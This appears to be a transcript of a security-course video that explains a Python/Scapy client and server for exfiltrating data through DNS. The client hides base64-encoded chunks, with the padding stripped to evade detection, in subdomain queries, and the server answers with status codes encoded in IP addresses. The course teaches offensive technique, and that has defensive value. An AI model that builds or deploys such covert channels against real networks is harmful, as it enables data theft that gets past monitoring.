Hello and welcome to this course in which we're talking about using Python for data exfiltration. In this video, we're going to be talking about using an alternative protocol for data exfiltration, namely data exfiltration via DNS. You're probably aware that DNS is one of the most widely used protocols on the Internet. It's purpose is to allow the translation from domain names like google.com to IP addresses. DNS is organized as a hierarchy, meaning that you've got DNS name servers for top-level domains like.com,.net, etc. Those provide information on how to find domains lower down the stack, more detailed, like google.com. Then, from say, google.com's name servers, you can find addresses for sites like mail.google.com or www.google.com. All of this is relevant to this particular video because DNS makes a very good option for data exfiltration. DNS traffic is never blocked at organizations network boundaries because it's very common for computers to make DNS requests and receive DNS responses. If they couldn't do that, you couldn't visit any website that you don't know the IP address for. Also, DNS is useful because it's a protocol where organizations are very accustomed to having people send requests to random name servers. Because the name server that gives you information on say, infosecinstitute.com, it's probably owned by the InfoSec Institute. What this means is that an attacker could set up a DNS server for a domain under their control and then ensure that any traffic intended for that domain involves a DNS request to their own server. That's what we're going to be taking advantage of in this video by embedding command and control data or exfiltrated data within DNS requests. Let's start by looking at the bottom of our client program. This is the equivalent of our main function. We've got two pieces of data that we're going to be sending using the send data function here. The first is actually something that you might be wanting to exfiltrate. In this case just the phrase, "this is secret data." The other one is the letter R. We've set up the client and the server here so that a research [inaudible] of data containing only a letter R by the server means that the current transmission is complete. If you're using DNS for exfiltrating a file, then you'd send a file, send the letter R, then send the next file. Obviously this is just a choice and you can configure the boundaries between packets, etc. How you wish when you're doing data exfiltration, and even with this particular tool. At the bottom of our client code, we see that we're calling a send data function that's actually going to do the data exfiltration here. That function is defined here in lines 26-33 of the client code and what we're going to be doing is breaking up the data that we're exfiltrating into multiple different chunks. Each chunk is going to be 10 characters long and the reason for this is that we're going to be encoding the data that we're trying to exfiltrate as a subdomain in a DNS request. We see up here towards the top of our screen that our base domain will be using is google.com, and so if we want it to say send the message, mail unencoded or unencrypted, we'd make a request for mail.google.com. If you've ever looked at domain names and DNS requests before, you know that the subdomains at the beginning are relatively short. If we're trying to exfiltrate an entire file via DNS, we need to break it up into chunks. If we have a DNS request for 10 kilobytes or whatever of data, followed by.google.com, that's going to look suspicious. What we're going to do is break our data into chunks of length 10 and then encode those chunks using base64. If you're not familiar, Base64 is an encoding algorithm, not an encryption algorithm. The important distinction there, is that there's no secret key involved in Base64 encoding, and so anyone can reverse a Base64 encoding. It just performs a level of obfuscation by making it a little bit harder to identify the data that's encoded. However, if you can identify the data as Base64 and decode it, then you get the original data. We're mainly using this to add a level of obfuscation to our data exfiltration. One other thing that we're doing, is using rstrip to remove the equal signs from the end of the data that we've encoded. The reason for this is that Base64 encoded data is very recognizable. You've got a limited character set, 64 characters, and most Base64 encoded data has an equal sign or two at the end. The reason why, is that Base64 is defined so that the equal signs result from padding data, and so anything that's not an exact multiple of the desired data length ends up with padding. We're going to remove this padding when we make the DNS requests, just to make it a little bit harder to tell that we're sending Base64 encoded data over the wire. Once we've encoded that data, we're going to call our DNS request function to actually send a DNS request for that encoded data, and that's defined up here in this function. As we mentioned, the DNS request is going to perform data exfiltration by using a sub-domain to hold the exfiltrated data. For example, we might have something, like Base64 encoded data.Google.com, and then we'll make a request to that sub-domain, and the server will send a response containing the IP address that is associated with that particular sub-domain, if it existed. What we do, is first, we need to build the domain we're requesting, so the data that we've sent that's encoded becomes the sub-domain, and then we append it to our defined domain, in this case, Google.com. We're able to use Google.com here, because we're controlling what server the request is sent to. We're sending it to a server under our control. Otherwise, you might want to use a domain that is controlled by you, and then set up a DNS server that any requests regarding that domain will be sent to. But since we're specifying the IP address to use, it's not really a problem right now. With that domain we've defined, we build a DNS query structure using scapy, which allows us to build and send custom packets over the network. We're also going to get the hardware address for the network interface we'll be using. This is only because we're going to be implementing this code on the localhost. The reason here, is that when you're using the localhost and scapy, scapy can be a little bit inconsistent with the interfaces that it uses. It wouldn't be uncommon for us to make a request over the WNIC and then have a response sent over the loopback. This becomes problematic if we're having a request response structure, because the requester, or the client doesn't realize that the packet coming back is intended for them. We're going to use explicit MAC addresses and build the Ethernet layer of our packet here, just to solve that problem and lock ourselves into a particular address, or a particular network interface card. However, you could eliminate this layer if you're sending things over the network to a remote host where the interfaces used will be consistent. As I mentioned, we're going to start by building a packet with the Ethernet layer and we're specifying the source and destination. Mac addresses are the same because they're the MAC address of the network interface card on the interface we want to use. Encapsulated within that Ethernet packet, we're going to put an IP packet. By default, it's an IPv4 packet, and the only thing that we need to define at this level is the IP address that we want to send the packet to. We're specifying a variable IP that's defined globally. In this case, it's the IP address of the local machine, 10.10.10.8, that we're using in this demo. If you're running this code on your own, make sure to substitute in your own IP address here, or else this isn't going to work. Beyond this destination IP address, Scapy will handle filling out the rest of the fields of our IP layer. Above the IP layer, we build a UDP packet. This is a choice since we're using DNS, because DNS can be implemented over UDP or TCP. However, UDP is often used because it's more of a lightweight protocol and DNS doesn't really require all of the guarantees that TCP provides. In our particular case here, UDP call and response or client-server request-response, whatever you want to call it, is a lot easier to implement than setting up a full TCP handshake to set up, send the data, and then tear it down at the end. Much easier to send a single request and a single response. At the UDP layer, again, we only need to find one thing, the destination port of the packet, or where our server code will be listening on the computer. Then above the UDP layer, we finally define a DNS layer. Here the only thing that we really need to define is the query that we're going to be making that we built up here. The only thing we defined there is the domain we're requesting. Again, as we build and send the packet, Scapy is going to handle all of the other fields and filling them with at least plausible, if not realistic values. Once we've built our packet, we can use Scapy srp1 function to send it. The choice of srp1 here comes from from two factors. The choice of something ending in a one is because we want to send and receive a single packet. Scapy has a couple of different options for doing that. One is sr1 and one is srp1. The reason why we're choosing srp1 in this case is because we want to send this packet at layer 2, because we've defined our own Ethernet address, because we're using the localhost, et cetera. If we delete the Ethernet layer of our packet here, then we can use sr1 and have Scapy handle all of the definition of the Ethernet layer. We're using srp1 here, providing the packet to send, and then, we're including a statement call saying verbose equals false. The reason for this is that Scapy can be rather talkative as it sends a packet and waits for a response. Setting verbose to false just means that we won't be getting all of that additional information on the command line. Once we've defined our packet, we can then call a process function to deal with the result. We're not going to dive into that process function quite yet. The reason why, is that process function is based off of the data that we receive in our response, and so we only make sense to talk about what that color response will be structured from the server before we dive into interpreting it. On the server side, again, we're going to be using Scapy. In this case, we're going to be defining a socket, but we're not actually going to be using it. The reason why we're defining a socket here is because if there's nothing listening on the port that we're sending traffic to, there's a good chance that we'll get an ICMP port unreachable or some other error because we're trying to access a port that doesn't have anything listening, and so we're having the Python code bind that port, so that's open, but notice that listen is commented out, we're not actually going to be using the socket and listen function to look at the traffic. Instead, we're going to be using sniff. Sniff is a function built into Scapy and it allows us to monitor the traffic coming over the network. We can use filters here, but we're going to just use an if statement later on. What we're doing here with this prn is saying that for every packet call, extract data pass in the packet to processing. Our extract data function is defined here. The goal of this function is to read in and interpret the information being sent via our DNS exfiltration, and then take action accordingly. We test to see if we have a DNS layer, and we also test if the destination port of the UDP traffic is port 1337 where we're supposed to be listening. If so, there's a good chance that this packet was intended for us. As we mentioned when we were talking about the client, we're going to be using sub-domains for our data exfiltration from client to server. How we access the sub-domain data here is we use x of DNS and then we.qd and then finally qname for question name. We saw this over here when we were defining the query qname equals d, and so we're extracting that same value on the other side. Next, we need to eliminate the part of that domain name that we don't actually care about. How our domain is structured is we've got a base64 encoded chunk of data followed by a period, followed by the rest of the domain name. By using the INDEX function here, we can look for the first instance of something happening in our string domain. In this case, we're looking for a period. That will be the period that separates our base 64 encoded string from the rest of the domain name. With the resulting index, we can truncate our domain name to just our base-64 encoded data. And so now we have something that's base64 encoded, but it's not necessarily base64 decodable at this point. Remember, when we are talking about the client that we said that we would be stripping the trailing equal signs from the tail of our data. This is problematic because we can't decode the data without those equal signs. However, we know how padding works with base64, and so we can put those equal signs back in. This calculation here is designed to tell us how many padding equals signs we're going to need at the end of our data based off of the length of the data mod 4, then subtract four from that and calculate it mod 4, just to be safe. Once we've got that number, we can create a string of equal signs by using equal sign times pad num. Say pad num is two, we'll add two equals signs, we convert it to bytes and we append it to the end of data. Now we have a properly padded base64 encoded chunk of data. With that in hand, we can call B64 decode to decode the data and then we'll call decode UTF8 to convert from bytes to a string. Now in theory, we should have either a chunk of the phrase, "This is secret data" or something saying that we're done with transmission. If we get the done with transmission decoded equals r, we're going to send a response, based off of this sent packet x and to the IP address 10.0.0.2 saying that's the IP address that is associated with the requested domain. We're then going to print n transmission imprint extracted, which is going to hold all of the data that we've read from our data exfiltration. Then a reset extract it to nothing so that we could build up again. If this isn't the end of transmission, we take our decoded data, append it to extract it, and then send a response with taking as input packet x and then the IP address 10.0.0.1. Finally, things can go wrong here, and so we also have some error handling code here. If we reach an exception, we're going to print the exception, and then we're going to send a response with x and 10.0.0.0. Notice here that the three IP addresses I've mentioned are all different and that's because our server-side responses to the client requests encode the data that they're sending back in the IP addresses. The last value, if it's zero, we've got an error, if it's a one, we have acknowledge a chunk of data sent, and if it's a two, it means that we've acknowledged that the end of this set of data chunks has been received. We send that in response to the R over here. The send response function that we reference here is defined up here towards the top of the code. What we start with is we've got a query which is the entire packet that was sent our request. Our question is at the DNS layer of the query.qd. That's what we've defined over in our client when we say DNS QR, qname equals d. Exact same thing. When we're defining our query, and defining our query response and our DNS packet, they need to be based off of this information. For example, when we call DNS RR, this is going to be our response. We want to say that RR name is equal to question.qname. This is essentially saying we are providing a response for the same domain name as the client requested from us. We also want to a time to live and then our data is the actual answer to the question, what is the IP address? That's going to be IP address that we pass back, so 10.0.0. something. With this question answer in hand, we can start to actually build our response packet. We're going to be building this response packet in the same way that we built the request packet up from the very bottom. We start with an Ethernet packet or Ethernet layer, and we say that both the source and destination MAC addresses are the same as the one from the query. Again, this is only to support local host transmissions because escapees oddness with interfaces. You don't need this if you're transmitting to a remote host. Once we define the Ethernet layer, again, we need to define the IP layer; a little bit more complicated here, because we need to find both the source and the destination IP address. It's important to note that they have to be switched from the request. If in the request we have a certain address at the source, it needs to be the destination address of the response, because that's the IP address of the client in this case. Same thing with the source, switch them around. At the UDP layer, same thing: we take the query or the request, we look at its UDP layer and get its source port, set it to this packet destination port, and then we can set the source port here to1337, because we know that's where we're listening. Finally, once we reach the DNS layer, we have to define a few different fields. We need to set the ID to match that of the query so that it knows that it's a response to its request. We then say qr1, we say qd1. Number of questions is one, number of answers is one, and then we specify our question, which is the query of DNS and ".qd." This is essentially our question here, and then "an" is answer here. Then we have a sleep command here. Again, this is because we're working on local host. It actually turns out that for some reason you might actually occasionally get the response sent before the request if you were implementing it on a local host in this way, just because apparently the response is built more quickly and makes it to the wire faster, and so obviously sending the response before the request is going to make it hard for the client to realize that this is the response to its request, so put a slight sleep in there just to keep things ordered properly. Then finally, we're going to use send P with the response. Again, the P here is specifying that we're working at layer two instead of layer three, and we would not need that if we were using, for example a remote host when we're sending traffic. Now let's open up a couple of terminal windows and see how this will work. We've got one here, move to the appropriate folder here, and then we move where I just accidentally started typing there, and then we'll open up a second terminal window to run the client code as well. In this one, we're going to run DNSExfiltrationServer.py. We got to have that running before our client starts, hit "Enter", so that's waiting for traffic to be sent to it. We then run in the other window, DNSExfiltration.py, this is our client code, if we hit "Enter" now we see that we're transmitting this as SE, our first chunk, there is the encoded version of it. Then we get a response from the server saying that it's received successfully. That means that if we look at our client code, we see that received successfully is if we receive a response at 10.0.0.1 from the server, so that's all good. We send the rest of the data, again, the b64 coded version of it. It was received successfully, again, a response to 10.0.0.1. Then we transmit that R for transmission complete. We are sending just UG, and we get acknowledged end transmission, which again means that we have IP of 10.0.0.2. We have a successful DNS exfiltration from the client to the server. In fact, the server is still running here as we see. We could transmit additional data to the server from the malware, so another session. We can do that just by running the code again, and it's going to go through the same series, send over the data, acknowledged end transmission. At the end we'd see this is the end transmission on the server. Everything gets read off the wire and then again down here. The goal of this demonstration was to show how to use an alternative protocol for data exfiltration. In this case, we're encapsulating our data exfiltration traffic within DNS requests, and then getting feedback from the server via DNS responses. We could certainly make this code more sophisticated, add additional functionality and provide the ability for the server to send more granular responses as well. We're just using the very last character of the IP address and only had three values without even working beyond that last, say, octet, we could have 256 possible responses from the server. This is only one way to encapsulate data exfiltration traffic within an alternative protocol. Thank you.